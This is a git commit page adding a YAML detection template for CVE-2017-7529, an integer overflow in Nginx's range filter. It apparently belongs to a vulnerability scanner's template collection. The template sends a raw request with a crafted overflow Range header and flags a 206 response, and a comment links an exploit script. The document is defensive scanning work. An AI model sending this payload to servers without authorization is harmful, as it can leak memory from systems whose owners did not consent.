Merge pull request #162 from harsh-bothra/patch-3

Create CVE-2017-7529.yaml
2020-06-30 16:53:44 +05:30 · 2020-06-30 16:53:44 +05:30 · 737d128c11
parent 2f59c74b28 dbaa71a763
commit 737d128c11
1 changed files with 24 additions and 0 deletions
--- a/cves/CVE-2017-7529.yaml
+++ b/cves/CVE-2017-7529.yaml
@ -0,0 +1,24 @@
+id: CVE-2017-7529
+info: 
+  author: "Harsh Bothra"
+  name: "Nginx Remote Integer Overflow"
+  severity: medium
+
+# This template supports the detection part only.
+# Do not test any website without permission
+# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
+
+requests: 
+  - raw: 
+      - |
+          GET / HTTP/1.1
+          Host: {{Hostname}}
+          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+          Accept-Language: en-US,en;q=0.5
+          Range: bytes=-17208,-9223372036854758792
+          Accept-Encoding: gzip, deflate
+          Connection: close
+    matchers:
+      - type: status
+        status:
+          - 206